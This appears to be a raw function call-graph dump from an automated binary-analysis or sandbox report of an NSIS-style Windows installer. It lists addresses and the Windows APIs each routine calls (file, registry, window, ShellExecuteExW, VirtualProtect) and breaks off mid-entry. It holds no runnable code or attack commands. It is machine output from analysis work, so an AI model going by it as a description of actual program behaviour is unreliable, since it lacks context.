4316->4317 4318 40608a GetShortPathNameW 4316->4318 4343 405ede GetFileAttributesW CreateFileW 4317->4343 4320 4061a9 4318->4320 4321 40609f 4318->4321 4320->4297 4321->4320 4323 4060a7 wsprintfA 4321->4323 4322 40606e CloseHandle GetShortPathNameW 4322->4320 4324 406082 4322->4324 4325 40640a 17 API calls 4323->4325 4324->4318 4324->4320 4326 4060cf 4325->4326 4344 405ede GetFileAttributesW CreateFileW 4326->4344 4328 4060dc 4328->4320 4329 4060eb GetFileSize GlobalAlloc 4328->4329 4330 4061a2 CloseHandle 4329->4330 4331 40610d 4329->4331 4330->4320 4345 405f61 ReadFile 4331->4345 4336 406140 4338 405e43 4 API calls 4336->4338 4337 40612c lstrcpyA 4339 40614e 4337->4339 4338->4339 4340 406185 SetFilePointer 4339->4340 4352 405f90 WriteFile 4340->4352 4343->4322 4344->4328 4346 405f7f 4345->4346 4346->4330 4347 405e43 lstrlenA 4346->4347 4348 405e84 lstrlenA 4347->4348 4349 405e8c 4348->4349 4350 405e5d lstrcmpiA 4348->4350 4349->4336 4349->4337 4350->4349 4351 405e7b CharNextA 4350->4351 4351->4348 4353 405fae GlobalFree 4352->4353 4353->4330 4354 4015c1 4355 402c41 17 API calls 4354->4355 4356 4015c8 4355->4356 4357 405d68 4 API calls 4356->4357 4362 4015d1 4357->4362 4358 401631 4360 401663 4358->4360 4361 401636 4358->4361 4359 405cea CharNextW 4359->4362 4365 401423 24 API calls 4360->4365 4381 401423 4361->4381 4362->4358 4362->4359 4371 401617 GetFileAttributesW 4362->4371 4373 4059b9 4362->4373 4376 40591f CreateDirectoryW 4362->4376 4385 40599c CreateDirectoryW 4362->4385 4367 40165b 4365->4367 4370 40164a SetCurrentDirectoryW 4370->4367 4371->4362 4388 4067c2 GetModuleHandleA 4373->4388 4377 405970 GetLastError 4376->4377 4378 40596c 4376->4378 4377->4378 4379 40597f SetFileSecurityW 4377->4379 4378->4362 4379->4378 4380 405995 GetLastError 4379->4380 4380->4378 4382 405450 24 API calls 4381->4382 4383 401431 4382->4383 4384 4063e8 lstrcpynW 4383->4384 4384->4370 4386 4059b0 GetLastError 4385->4386 4387 4059ac 4385->4387 4386->4387 4387->4362 4389 4067e8 GetProcAddress 4388->4389 4390 4067de 4388->4390 4392 4059c0 4389->4392 4394 406752 GetSystemDirectoryW 4390->4394 4392->4362 4393 4067e4 4393->4389 4393->4392 4395 406774 wsprintfW LoadLibraryExW 4394->4395 4395->4393 4397 4053c4 4398 4053d4 4397->4398 4399 4053e8 4397->4399 4400 405431 4398->4400 4401 4053da 4398->4401 4402 4053f0 IsWindowVisible 4399->4402 4409 405410 4399->4409 4403 405436 CallWindowProcW 4400->4403 4411 4043ab 4401->4411 4402->4400 4405 4053fd 4402->4405 4406 4053e4 4403->4406 4414 404d1a SendMessageW 4405->4414 4409->4403 4419 404d9a 4409->4419 4412 4043c3 4411->4412 4413 4043b4 SendMessageW 4411->4413 4412->4406 4413->4412 4415 404d79 SendMessageW 4414->4415 4416 404d3d GetMessagePos ScreenToClient SendMessageW 4414->4416 4417 404d71 4415->4417 4416->4417 4418 404d76 4416->4418 4417->4409 4418->4415 4428 4063e8 lstrcpynW 4419->4428 4421 404dad 4429 40632f wsprintfW 4421->4429 4423 404db7 4430 40140b 4423->4430 4427 404dc7 4427->4400 4428->4421 4429->4423 4434 401389 4430->4434 4433 4063e8 lstrcpynW 4433->4427 4435 401390 4434->4435 4436 4013fe 4435->4436 4437 4013cb MulDiv SendMessageW 4435->4437 4436->4433 4437->4435 4882 401e49 4883 402c1f 17 API calls 4882->4883 4884 401e4f 4883->4884 4885 402c1f 17 API calls 4884->4885 4886 401e5b 4885->4886 4887 401e72 EnableWindow 4886->4887 4888 401e67 ShowWindow 4886->4888 4889 402ac5 4887->4889 4888->4889 4890 701a2993 4891 701a29e3 4890->4891 4892 701a29a3 VirtualProtect 4890->4892 4892->4891 4893 40264a 4894 402c1f 17 API calls 4893->4894 4895 402659 4894->4895 4896 4026a3 ReadFile 4895->4896 4897 40273c 4895->4897 4898 405f61 ReadFile 4895->4898 4900 4026e3 MultiByteToWideChar 4895->4900 4901 402798 4895->4901 4903 402709 SetFilePointer MultiByteToWideChar 4895->4903 4904 4027a9 4895->4904 4906 402796 4895->4906 4896->4895 4896->4906 4897->4895 4897->4906 4907 405fbf SetFilePointer 4897->4907 4898->4895 4900->4895 4916 40632f wsprintfW 4901->4916 4903->4895 4905 4027ca SetFilePointer 4904->4905 4904->4906 4905->4906 4908 405fdb 4907->4908 4915 405ff3 4907->4915 4909 405f61 ReadFile 4908->4909 4910 405fe7 4909->4910 4911 406024 SetFilePointer 4910->4911 4912 405ffc SetFilePointer 4910->4912 4910->4915 4911->4915 4912->4911 4913 406007 4912->4913 4914 405f90 WriteFile 4913->4914 4914->4915 4915->4897 4916->4906 4917 404dcc GetDlgItem GetDlgItem 4918 404e1e 7 API calls 4917->4918 4927 405037 4917->4927 4919 404ec1 DeleteObject 4918->4919 4920 404eb4 SendMessageW 4918->4920 4921 404eca 4919->4921 4920->4919 4922 404f01 4921->4922 4923 404ed9 4921->4923 4924 40435f 18 API calls 4922->4924 4926 40640a 17 API calls 4923->4926 4930 404f15 4924->4930 4925 4051c7 4933 4051d1 SendMessageW 4925->4933 4934 4051d9 4925->4934 4935 404ee3 SendMessageW SendMessageW 4926->4935 4928 4050fc 4927->4928 4929 405097 4927->4929 4931 40511b 4927->4931 4928->4931 4940 40510d SendMessageW 4928->4940 4936 404d1a 5 API calls 4929->4936 4937 40435f 18 API calls 4930->4937 4931->4925 4932 4053af 4931->4932 4938 405174 SendMessageW 4931->4938 4939 4043c6 8 API calls 4932->4939 4933->4934 4941 4051f2 4934->4941 4942 4051eb ImageList_Destroy 4934->4942 4955 405202 4934->4955 4935->4921 4953 4050a8 4936->4953 4954 404f23 4937->4954 4938->4932 4944 405189 SendMessageW 4938->4944 4945 4053bd 4939->4945 4940->4931 4946 4051fb GlobalFree 4941->4946 4941->4955 4942->4941 4943 405371 4943->4932 4950 405383 ShowWindow GetDlgItem ShowWindow 4943->4950 4948 40519c 4944->4948 4946->4955 4947 404ff8 GetWindowLongW SetWindowLongW 4949 405011 4947->4949 4959 4051ad SendMessageW 4948->4959 4951 405017 ShowWindow 4949->4951 4952 40502f 4949->4952 4950->4932 4973 404394 SendMessageW 4951->4973 4974 404394 SendMessageW 4952->4974 4953->4928 4954->4947 4958 404f73 SendMessageW 4954->4958 4960 404ff2 4954->4960 4961 404fc0 SendMessageW 4954->4961 4962 404faf SendMessageW 4954->4962 4955->4943 4963 404d9a 4 API calls 4955->4963 4968 40523d 4955->4968 4958->4954 4959->4925 4960->4947 4960->4949 4961->4954 4962->4954 4963->4968 4964 40502a 4964->4932 4965 405347 InvalidateRect 4965->4943 4966 40535d 4965->4966 4975 404cd5 4966->4975 4967 40526b SendMessageW 4969 405281 4967->4969 4968->4967 4968->4969 4969->4965 4970 4052e2 4969->4970 4972 4052f5 SendMessageW SendMessageW 4969->4972 4970->4972 4972->4969 4973->4964 4974->4927 4978 404c0c 4975->4978 4977 404cea 4977->4943 4979 404c25 4978->4979 4980 40640a 17 API calls 4979->4980 4981 404c89 4980->4981 4982 40640a 17 API calls 4981->4982 4983 404c94 4982->4983 4984 40640a 17 API calls 4983->4984 4985 404caa lstrlenW wsprintfW SetDlgItemTextW 4984->4985 4985->4977 5291 4016cc 5292 402c41 17 API calls 5291->5292 5293 4016d2 GetFullPathNameW 5292->5293 5294 4016ec 5293->5294 5295 40170e 5293->5295 5294->5295 5298 40672b 2 API calls 5294->5298 5296 401723 GetShortPathNameW 5295->5296 5297 402ac5 5295->5297 5296->5297 5299 4016fe 5298->5299 5299->5295 5301 4063e8 lstrcpynW 5299->5301 5301->5295 5302 40234e 5303 402c41 17 API calls 5302->5303 5304 40235d 5303->5304 5305 402c41 17 API calls 5304->5305 5306 402366 5305->5306 5307 402c41 17 API calls 5306->5307 5308 402370 GetPrivateProfileStringW 5307->5308 5309 4044cf lstrlenW 5310 4044f0 WideCharToMultiByte 5309->5310 5311 4044ee 5309->5311 5311->5310 5312 404850 5313 40487c 5312->5313 5314 40488d 5312->5314 5373 405a32 GetDlgItemTextW 5313->5373 5316 404899 GetDlgItem 5314->5316 5348 4048f8 5314->5348 5321 4048ad 5316->5321 5317 404887 5318 40667c 5 API calls 5317->5318 5318->5314 5319 4049dc 5322 404b8b 5319->5322 5375 405a32 GetDlgItemTextW 5319->5375 5320 4048c1 SetWindowTextW 5324 40435f 18 API calls 5320->5324 5321->5320 5328 405d68 4 API calls 5321->5328 5327 4043c6 8 API calls 5322->5327 5329 4048dd 5324->5329 5325 40640a 17 API calls 5330 40496c SHBrowseForFolderW 5325->5330 5326 404a0c 5331 405dc5 18 API calls 5326->5331 5332 404b9f 5327->5332 5333 4048b7 5328->5333 5334 40435f 18 API calls 5329->5334 5330->5319 5335 404984 CoTaskMemFree 5330->5335 5336 404a12 5331->5336 5333->5320 5339 405cbd 3 API calls 5333->5339 5337 4048eb 5334->5337 5338 405cbd 3 API calls 5335->5338 5376 4063e8 lstrcpynW 5336->5376 5374 404394 SendMessageW 5337->5374 5341 404991 5338->5341 5339->5320 5344 4049c8 SetDlgItemTextW 5341->5344 5349 40640a 17 API calls 5341->5349 5343 4048f1 5346 4067c2 5 API calls 5343->5346 5344->5319 5345 404a29 5347 4067c2 5 API calls 5345->5347 5346->5348 5356 404a30 5347->5356 5348->5319 5348->5322 5348->5325 5350 4049b0 lstrcmpiW 5349->5350 5350->5344 5353 4049c1 lstrcatW 5350->5353 5351 404a71 5377 4063e8 lstrcpynW 5351->5377 5353->5344 5354 404a78 5355 405d68 4 API calls 5354->5355 5357 404a7e GetDiskFreeSpaceW 5355->5357 5356->5351 5359 405d09 2 API calls 5356->5359 5361 404ac9 5356->5361 5360 404aa2 MulDiv 5357->5360 5357->5361 5359->5356 5360->5361 5362 404b3a 5361->5362 5363 404cd5 20 API calls 5361->5363 5364 404b5d 5362->5364 5366 40140b 2 API calls 5362->5366 5365 404b27 5363->5365 5378 404381 EnableWindow 5364->5378 5368 404b3c SetDlgItemTextW 5365->5368 5369 404b2c 5365->5369 5366->5364 5368->5362 5371 404c0c 20 API calls 5369->5371 5370 404b79 5370->5322 5379 4047a9 5370->5379 5371->5362 5373->5317 5374->5343 5375->5326 5376->5345 5377->5354 5378->5370 5380 4047b7 5379->5380 5381 4047bc SendMessageW 5379->5381 5380->5381 5381->5322 5382 401b53 5383 402c41 17 API calls 5382->5383 5384 401b5a 5383->5384 5385 402c1f 17 API calls 5384->5385 5386 401b63 wsprintfW 5385->5386 5387 402ac5 5386->5387 5388 401956 5389 402c41 17 API calls 5388->5389 5390 40195d lstrlenW 5389->5390 5391 402592 5390->5391 5392 406ed6 5396 406976 5392->5396 5393 4072e1 5394 406a00 GlobalAlloc 5394->5393 5394->5396 5395 4069f7 GlobalFree 5395->5394 5396->5393 5396->5394 5396->5395 5396->5396 5397 406a77 GlobalAlloc 5396->5397 5398 406a6e GlobalFree 5396->5398 5397->5393 5397->5396 5398->5397 5399 4014d7 5400 402c1f 17 API calls 5399->5400 5401 4014dd Sleep 5400->5401 5403 402ac5 5401->5403 5404 401f58 5405 402c41 17 API calls 5404->5405 5406 401f5f 5405->5406 5407 40672b 2 API calls 5406->5407 5408 401f65 5407->5408 5410 401f76 5408->5410 5411 40632f wsprintfW 5408->5411 5411->5410 5412 402259 5413 402c41 17 API calls 5412->5413 5414 40225f 5413->5414 5415 402c41 17 API calls 5414->5415 5416 402268 5415->5416 5417 402c41 17 API calls 5416->5417 5418 402271 5417->5418 5419 40672b 2 API calls 5418->5419 5420 40227a 5419->5420 5421 40228b lstrlenW lstrlenW 5420->5421 5426 40227e 5420->5426 5423 405450 24 API calls 5421->5423 5422 405450 24 API calls 5425 402286 5422->5425 5424 4022c9 SHFileOperationW 5423->5424 5424->5425 5424->5426 5426->5422 5427 701a1000 5430 701a101b 5427->5430 5437 701a1516 5430->5437 5432 701a1020 5433 701a1027 GlobalAlloc 5432->5433 5434 701a1024 5432->5434 5433->5434 5435 701a153d 3 API calls 5434->5435 5436 701a1019 5435->5436 5439 701a151c 5437->5439 5438 701a1522 5438->5432 5439->5438 5440 701a152e GlobalFree 5439->5440 5440->5432 5282 40175c 5283 402c41 17 API calls 5282->5283 5284 401763 5283->5284 5285 405f0d 2 API calls 5284->5285 5286 40176a 5285->5286 5287 405f0d 2 API calls 5286->5287 5287->5286 5441 401d5d GetDlgItem GetClientRect 5442 402c41 17 API calls 5441->5442 5443 401d8f LoadImageW SendMessageW 5442->5443 5444 402ac5 5443->5444 5445 401dad DeleteObject 5443->5445 5445->5444 5446 4022dd 5447 4022f7 5446->5447 5448 4022e4 5446->5448 5449 40640a 17 API calls 5448->5449 5450 4022f1 5449->5450 5451 405a4e MessageBoxIndirectW 5450->5451 5451->5447 5452 401563 5453 402a6b 5452->5453 5456 40632f wsprintfW 5453->5456 5455 402a70 5456->5455 4438 4023e4 4439 402c41 17 API calls 4438->4439 4440 4023f6 4439->4440 4441 402c41 17 API calls 4440->4441 4442 402400 4441->4442 4455 402cd1 4442->4455 4445 402438 4450 402444 4445->4450 4459 402c1f 4445->4459 4446 40288b 4447 402c41 17 API calls 4451 40242e lstrlenW 4447->4451 4449 402463 RegSetValueExW 4453 402479 RegCloseKey 4449->4453 4450->4449 4462 4031d6 4450->4462 4451->4445 4453->4446 4456 402cec 4455->4456 4477 406283 4456->4477 4460 40640a 17 API calls 4459->4460 4461 402c34 4460->4461 4461->4450 4463 403201 4462->4463 4464 4031e5 SetFilePointer 4462->4464 4481 4032de GetTickCount 4463->4481 4464->4463 4467 40329e 4467->4449 4468 405f61 ReadFile 4469 403221 4468->4469 4469->4467 4470 4032de 42 API calls 4469->4470 4471 403238 4470->4471 4471->4467 4472 4032a4 ReadFile 4471->4472 4474 403247 4471->4474 4472->4467 4474->4467 4475 405f61 ReadFile 4474->4475 4476 405f90 WriteFile 4474->4476 4475->4474 4476->4474 4478 406292 4477->4478 4479 40629d RegCreateKeyExW 4478->4479 4480 402410 4478->4480 4479->4480 4480->4445 4480->4446 4480->4447 4482 403436 4481->4482 4483 40330c 4481->4483 4484 402e8e 32 API calls 4482->4484 4494 40345d SetFilePointer 4483->4494 4490 403208 4484->4490 4486 403317 SetFilePointer 4492 40333c 4486->4492 4490->4467 4490->4468 4491 405f90 WriteFile 4491->4492 4492->4490 4492->4491 4493 403417 SetFilePointer 4492->4493 4495 403447 4492->4495 4498 406943 4492->4498 4505 402e8e 4492->4505 4493->4482 4494->4486 4496 405f61 ReadFile 4495->4496 4497 40345a 4496->4497 4497->4492 4499 406968 4498->4499 4500 406970 4498->4500 4499->4492 4500->4499 4501 406a00 GlobalAlloc 4500->4501 4502 4069f7 GlobalFree 4500->4502 4503 406a77 GlobalAlloc 4500->4503 4504 406a6e GlobalFree 4500->4504 4501->4499 4501->4500 4502->4501 4503->4499 4503->4500 4504->4503 4506 402eb7 4505->4506 4507 402e9f 4505->4507 4509 402ec7 GetTickCount 4506->4509 4510 402ebf 4506->4510 4508 402ea8 DestroyWindow 4507->4508 4515 402eaf 4507->4515 4508->4515 4512 402ed5 4509->4512 4509->4515 4520 4067fe 4510->4520 4513 402f0a CreateDialogParamW ShowWindow 4512->4513 4514 402edd 4512->4514 4513->4515 4514->4515 4524 402e72 4514->4524 4515->4492 4517 402eeb wsprintfW 4518 405450 24 API calls 4517->4518 4519 402f08 4518->4519 4519->4515 4521 40681b PeekMessageW 4520->4521 4522 406811 DispatchMessageW 4521->4522 4523 40682b 4521->4523 4522->4521 4523->4515 4525 402e81 4524->4525 4526 402e83 MulDiv 4524->4526 4525->4526 4526->4517 5464 701a103d 5465 701a101b 5 API calls 5464->5465 5466 701a1056 5465->5466 5467 402868 5468 402c41 17 API calls 5467->5468 5469 40286f FindFirstFileW 5468->5469 5470 402897 5469->5470 5474 402882 5469->5474 5475 40632f wsprintfW 5470->5475 5472 4028a0 5476 4063e8 lstrcpynW 5472->5476 5475->5472 5476->5474 5477 401968 5478 402c1f 17 API calls 5477->5478 5479 40196f 5478->5479 5480 402c1f 17 API calls 5479->5480 5481 40197c 5480->5481 5482 402c41 17 API calls 5481->5482 5483 401993 lstrlenW 5482->5483 5485 4019a4 5483->5485 5484 4019e5 5485->5484 5489 4063e8 lstrcpynW 5485->5489 5487 4019d5 5487->5484 5488 4019da lstrlenW 5487->5488 5488->5484 5489->5487 5490 40166a 5491 402c41 17 API calls 5490->5491 5492 401670 5491->5492 5493 40672b 2 API calls 5492->5493 5494 401676 5493->5494 5015 40176f 5016 402c41 17 API calls 5015->5016 5017 401776 5016->5017 5018 401796 5017->5018 5019 40179e 5017->5019 5055 4063e8 lstrcpynW 5018->5055 5056 4063e8 lstrcpynW 5019->5056 5022 40179c 5026 40667c 5 API calls 5022->5026 5023 4017a9 5024 405cbd 3 API calls 5023->5024 5025 4017af lstrcatW 5024->5025 5025->5022 5048 4017bb 5026->5048 5027 40672b 2 API calls 5027->5048 5028 4017f7 5029 405eb9 2 API calls 5028->5029 5029->5048 5031 4017cd CompareFileTime 5031->5048 5032 40188d 5034 405450 24 API calls 5032->5034 5033 401864 5035 405450 24 API calls 5033->5035 5053 401879 5033->5053 5036 401897 5034->5036 5035->5053 5037 4031d6 44 API calls 5036->5037 5038 4018aa 5037->5038 5039 4018be SetFileTime 5038->5039 5041 4018d0 CloseHandle 5038->5041 5039->5041 5040 40640a 17 API calls 5040->5048 5042 4018e1 5041->5042 5041->5053 5043 4018e6 5042->5043 5044 4018f9 5042->5044 5046 40640a 17 API calls 5043->5046 5047 40640a 17 API calls 5044->5047 5045 4063e8 lstrcpynW 5045->5048 5049 4018ee lstrcatW 5046->5049 5050 401901 5047->5050 5048->5027 5048->5028 5048->5031 5048->5032 5048->5033 5048->5040 5048->5045 5051 405a4e MessageBoxIndirectW 5048->5051 5054 405ede GetFileAttributesW CreateFileW 5048->5054 5049->5050 5052 405a4e MessageBoxIndirectW 5050->5052 5051->5048 5052->5053 5054->5048 5055->5022 5056->5023 5057 4027ef 5058 402a70 5057->5058 5059 4027f6 5057->5059 5060 402c1f 17 API calls 5059->5060 5061 4027fd 5060->5061 5062 40280c SetFilePointer 5061->5062 5062->5058 5063 40281c 5062->5063 5065 40632f wsprintfW 5063->5065 5065->5058 5495 401a72 5496 402c1f 17 API calls 5495->5496 5497 401a7b 5496->5497 5498 402c1f 17 API calls 5497->5498 5499 401a20 5498->5499 5500 406af2 5501 406976 5500->5501 5502 4072e1 5501->5502 5503 406a00 GlobalAlloc 5501->5503 5504 4069f7 GlobalFree 5501->5504 5505 406a77 GlobalAlloc 5501->5505 5506 406a6e GlobalFree 5501->5506 5503->5501 5503->5502 5504->5503 5505->5501 5505->5502 5506->5505 5507 401573 5508 401583 ShowWindow 5507->5508 5509 40158c 5507->5509 5508->5509 5510 402ac5 5509->5510 5511 40159a ShowWindow 5509->5511 5511->5510 5512 401cf3 5513 402c1f 17 API calls 5512->5513 5514 401cf9 IsWindow 5513->5514 5515 401a20 5514->5515 5516 402df3 5517 402e05 SetTimer 5516->5517 5518 402e1e 5516->5518 5517->5518 5519 402e6c 5518->5519 5520 402e72 MulDiv 5518->5520 5521 402e2c wsprintfW SetWindowTextW SetDlgItemTextW 5520->5521 5521->5519 5523 4014f5 SetForegroundWindow 5524 402ac5 5523->5524 5525 402576 5526 402c41 17 API calls 5525->5526 5527 40257d 5526->5527 5530 405ede GetFileAttributesW CreateFileW 5527->5530 5529 402589 5530->5529 5531 401b77 5532 401b84 5531->5532 5533 401bc8 5531->5533 5536 401c0d 5532->5536 5541 401b9b 5532->5541 5534 401bf2 GlobalAlloc 5533->5534 5535 401bcd 5533->5535 5538 40640a 17 API calls 5534->5538 5549 4022f7 5535->5549 5552 4063e8 lstrcpynW 5535->5552 5537 40640a 17 API calls 5536->5537 5536->5549 5539 4022f1 5537->5539 5538->5536 5545 405a4e MessageBoxIndirectW 5539->5545 5550 4063e8 lstrcpynW 5541->5550 5542 401bdf GlobalFree 5542->5549 5544 401baa 5551 4063e8 lstrcpynW 5544->5551 5545->5549 5547 401bb9 5553 4063e8 lstrcpynW 5547->5553 5550->5544 5551->5547 5552->5542 5553->5549 5257 4024f8 5258 402c81 17 API calls 5257->5258 5259 402502 5258->5259 5260 402c1f 17 API calls 5259->5260 5261 40250b 5260->5261 5262 402533 RegEnumValueW 5261->5262 5263 402527 RegEnumKeyW 5261->5263 5266 40288b 5261->5266 5264 40254f RegCloseKey 5262->5264 5265 402548 5262->5265 5263->5264 5264->5266 5265->5264 5268 40167b 5269 402c41 17 API calls 5268->5269 5270 401682 5269->5270 5271 402c41 17 API calls 5270->5271 5272 40168b 5271->5272 5273 402c41 17 API calls 5272->5273 5274 401694 MoveFileW 5273->5274 5275 4016a0 5274->5275 5276 4016a7 5274->5276 5277 401423 24 API calls 5275->5277 5278 40672b 2 API calls 5276->5278 5280 402250 5276->5280 5277->5280 5279 4016b6 5278->5279 5279->5280 5281 4061ae 36 API calls 5279->5281 5281->5275 5561 401e7d 5562 402c41 17 API calls 5561->5562 5563 401e83 5562->5563 5564 402c41 17 API calls 5563->5564 5565 401e8c 5564->5565 5566 402c41 17 API calls 5565->5566 5567 401e95 5566->5567 5568 402c41 17 API calls 5567->5568 5569 401e9e 5568->5569 5570 401423 24 API calls 5569->5570 5571 401ea5 5570->5571 5578 405a14 ShellExecuteExW 5571->5578 5573 401ee7 5574 40288b 5573->5574 5579 406873 WaitForSingleObject 5573->5579 5576 401f01 CloseHandle 5576->5574 5578->5573 5580 40688d 5579->5580 5581 40689f GetExitCodeProcess 5580->5581 5582 4067fe 2 API calls 5580->5582 5581->5576 5583 406894 WaitForSingleObject 5582->5583 5583->5580 5584 4019ff 5585 402c41 17 API calls 5584->5585 5586 401a06 5585->5586 5587 402c41 17 API calls 5586->5587 5588 401a0f 5587->5588 5589 401a16 lstrcmpiW 5588->5589 5590 401a28 lstrcmpW 5588->5590 5591 401a1c 5589->5591 5590->5591 5592 401000 5593 401037 BeginPaint GetClientRect 5592->5593 5594 40100c DefWindowProcW 5592->5594 5596 4010f3 5593->5596 5597 401179 5594->5597 5598 401073 CreateBrushIndirect FillRect DeleteObject 5596->5598 5599 4010fc 5596->5599 5598->5596 5600 401102 CreateFontIndirectW 5599->5600 5601 401167 EndPaint 5599->5601 5600->5601 5602 401112 6 API calls 5600->5602 5601->5597 5602->5601 5603 701a1058 5605 701a1074 5603->5605 5604 701a10dd 5605->5604 5606 701a1516 GlobalFree 5605->5606 5607 701a1092 5605->5607 5606->5607 5608 701a1516 GlobalFree 5607->5608 5609 701a10a2 5608->5609 5610 701a10a9 GlobalSize 5609->5610 5611 701a10b2 5609->5611 5610->5611 5612 701a10c7 5611->5612 5613 701a10b6 GlobalAlloc 5611->5613 5615 701a10d2 GlobalFree 5612->5615 5614 701a153d 3 API calls 5613->5614 5614->5612 5615->5604 5616 401503 5617 40150b 5616->5617 5619 40151e 5616->5619 5618 402c1f 17 API calls 5617->5618 5618->5619 5620 701a18d9 5621 701a18fc 5620->5621 5622 701a1943 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5621->5622 5623 701a1931 GlobalFree 5621->5623 5624 701a1272 2 API calls 5622->5624 5623->5622 5625 701a1ace GlobalFree GlobalFree 5624->5625 4527 402484 4538 402c81 4527->4538 4530 402c41 17 API calls 4531 402497 4530->4531 4532 4024a2 RegQueryValueExW 4531->4532 4534 40288b 4531->4534 4533 4024c2 4532->4533 4535 4024c8 RegCloseKey 4532->4535 4533->4535 4543 40632f wsprintfW 4533->4543 4535->4534 4539 402c41 17 API calls 4538->4539 4540 402c98 4539->4540 4541 406255 RegOpenKeyExW 4540->4541 4542 40248e 4541->4542 4542->4530 4543->4535 5626 402104 5627 402c41 17 API calls 5626->5627 5628 40210b 5627->5628 5629 402c41 17 API calls 5628->5629 5630 402115 5629->5630 5631 402c41 17 API calls 5630->5631 5632 40211f 5631->5632 5633 402c41 17 API calls 5632->5633 5634 402129 5633->5634 5635 402c41 17 API calls 5634->5635 5637 402133 5635->5637 5636 402172 CoCreateInstance 5641 402191 5636->5641 5637->5636 5638 402c41 17 API calls 5637->5638 5638->5636 5639 401423 24 API calls 5640 402250 5639->5640 5641->5639 5641->5640 4787 403e86 4788 403fd9 4787->4788 4789 403e9e 4787->4789 4790 40402a 4788->4790 4791 403fea GetDlgItem GetDlgItem 4788->4791 4789->4788 4792 403eaa 4789->4792 4796 404084 4790->4796 4804 401389 2 API calls 4790->4804 4795 40435f 18 API calls 4791->4795 4793 403eb5 SetWindowPos 4792->4793 4794 403ec8 4792->4794 4793->4794 4797 403ee5 4794->4797 4798 403ecd ShowWindow 4794->4798 4799 404014 SetClassLongW 4795->4799 4800 4043ab SendMessageW 4796->4800 4820 403fd4 4796->4820 4801 403f07 4797->4801 4802 403eed DestroyWindow 4797->4802 4798->4797 4803 40140b 2 API calls 4799->4803 4815 404096 4800->4815 4806 403f0c SetWindowLongW 4801->4806 4807 403f1d 4801->4807 4805 404309 4802->4805 4803->4790 4808 40405c 4804->4808 4814 404319 ShowWindow 4805->4814 4805->4820 4806->4820 4811 403fc6 4807->4811 4812 403f29 GetDlgItem 4807->4812 4808->4796 4813 404060 SendMessageW 4808->4813 4809 40140b 2 API calls 4809->4815 4810 4042ea DestroyWindow EndDialog 4810->4805 4868 4043c6 4811->4868 4816 403f59 4812->4816 4817 403f3c SendMessageW IsWindowEnabled 4812->4817 4813->4820 4814->4820 4815->4809 4815->4810 4819 40640a 17 API calls 4815->4819 4815->4820 4825 40435f 18 API calls 4815->4825 4849 40422a DestroyWindow 4815->4849 4859 40435f 4815->4859 4821 403f66 4816->4821 4822 403f79 4816->4822 4823 403fad SendMessageW 4816->4823 4831 403f5e 4816->4831 4817->4816 4817->4820 4819->4815 4821->4823 4821->4831 4826 403f81 4822->4826 4827 403f96 4822->4827 4823->4811 4825->4815 4829 40140b 2 API calls 4826->4829 4830 40140b 2 API calls 4827->4830 4828 403f94 4828->4811 4829->4831 4832 403f9d 4830->4832 4865 404338 4831->4865 4832->4811 4832->4831 4834 404111 GetDlgItem 4835 404126 4834->4835 4836 40412e ShowWindow KiUserCallbackDispatcher 4834->4836 4835->4836 4862 404381 EnableWindow 4836->4862 4838 404158 EnableWindow 4843 40416c 4838->4843 4839 404171 GetSystemMenu EnableMenuItem SendMessageW 4840 4041a1 SendMessageW 4839->4840 4839->4843 4840->4843 4842 403e67 18 API calls 4842->4843 4843->4839 4843->4842 4863 404394 SendMessageW 4843->4863 4864 4063e8 lstrcpynW 4843->4864 4845 4041d0 lstrlenW 4846 40640a 17 API calls 4845->4846 4847 4041e6 SetWindowTextW 4846->4847 4848 401389 2 API calls 4847->4848 4848->4815 4849->4805 4850 404244 CreateDialogParamW 4849->4850 4850->4805 4851 404277 4850->4851 4852 40435f 18 API calls 4851->4852 4853 404282 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4852->4853 4854 401389 2 API calls 4853->4854 4855 4042c8 4854->4855 4855->4820 4856 4042d0 ShowWindow 4855->4856 4857 4043ab SendMessageW 4856->4857 4858 4042e8 4857->4858 4858->4805 4860 40640a 17 API calls 4859->4860 4861 40436a SetDlgItemTextW 4860->4861 4861->4834 4862->4838 4863->4843 4864->4845 4866 404345 SendMessageW 4865->4866 4867 40433f 4865->4867 4866->4828 4867->4866 4869 404489 4868->4869 4870 4043de GetWindowLongW 4868->4870 4869->4820 4870->4869 4871 4043f3 4870->4871 4871->4869 4872 404420 GetSysColor 4871->4872 4873 404423 4871->4873 4872->4873 4874 404433 SetBkMode 4873->4874 4875 404429 SetTextColor 4873->4875 4876 404451 4874->4876 4877 40444b GetSysColor 4874->4877 4875->4874 4878 404462 4876->4878 4879 404458 SetBkColor 4876->4879 4877->4876 4878->4869 4880 404475 DeleteObject 4878->4880 4881 40447c CreateBrushIndirect 4878->4881 4879->4878 4880->4881 4881->4869 5642 401f06 5643 402c41 17 API calls 5642->5643 5644 401f0c 5643->5644 5645 405450 24 API calls 5644->5645 5646 401f16 5645->5646 5647 4059d1 2 API calls 5646->5647 5648 401f1c 5647->5648 5649 401f3f CloseHandle 5648->5649 5651 406873 5 API calls 5648->5651 5652 40288b 5648->5652 5649->5652 5653 401f31 5651->5653 5653->5649 5655 40632f wsprintfW 5653->5655 5655->5649 5656 404809 5657 404819 5656->5657 5658 40483f 5656->5658 5659 40435f 18 API calls 5657->5659 5660 4043c6 8 API calls 5658->5660 5661 404826 SetDlgItemTextW 5659->5661 5662 40484b 5660->5662 5661->5658 5663 40190c 5664 401943 5663->5664 5665 402c41 17 API calls 5664->5665 5666 401948 5665->5666 5667 405afa 67 API calls 5666->5667 5668 401951 5667->5668 5669 40230c 5670 402314 5669->5670 5671 40231a 5669->5671 5672 402c41 17 API calls 5670->5672 5673 402328 5671->5673 5674 402c41 17 API calls 5671->5674 5672->5671 5676 402c41 17 API calls 5673->5676 5678 402336 5673->5678 5674->5673 5675 402c41 17 API calls 5677 40233f WritePrivateProfileStringW 5675->5677 5676->5678 5678->5675 5679 401f8c 5680 402c41 17 API calls 5679->5680 5681 401f93 5680->5681 5682 4067c2 5 API calls 5681->5682 5683 401fa2 5682->5683 5684 402026 5683->5684 5685 401fbe GlobalAlloc 5683->5685 5685->5684 5686 401fd2 5685->5686 5687 4067c2 5 API calls 5686->5687 5688 401fd9 5687->5688 5689 4067c2 5 API calls 5688->5689 5690 401fe3 5689->5690 5690->5684 5694 40632f wsprintfW 5690->5694 5692 402018 5695 40632f wsprintfW 5692->5695 5694->5692 5695->5684 5696 701a2c57 5697 701a2c6f 5696->5697 5698 701a158f 2 API calls 5697->5698 5699 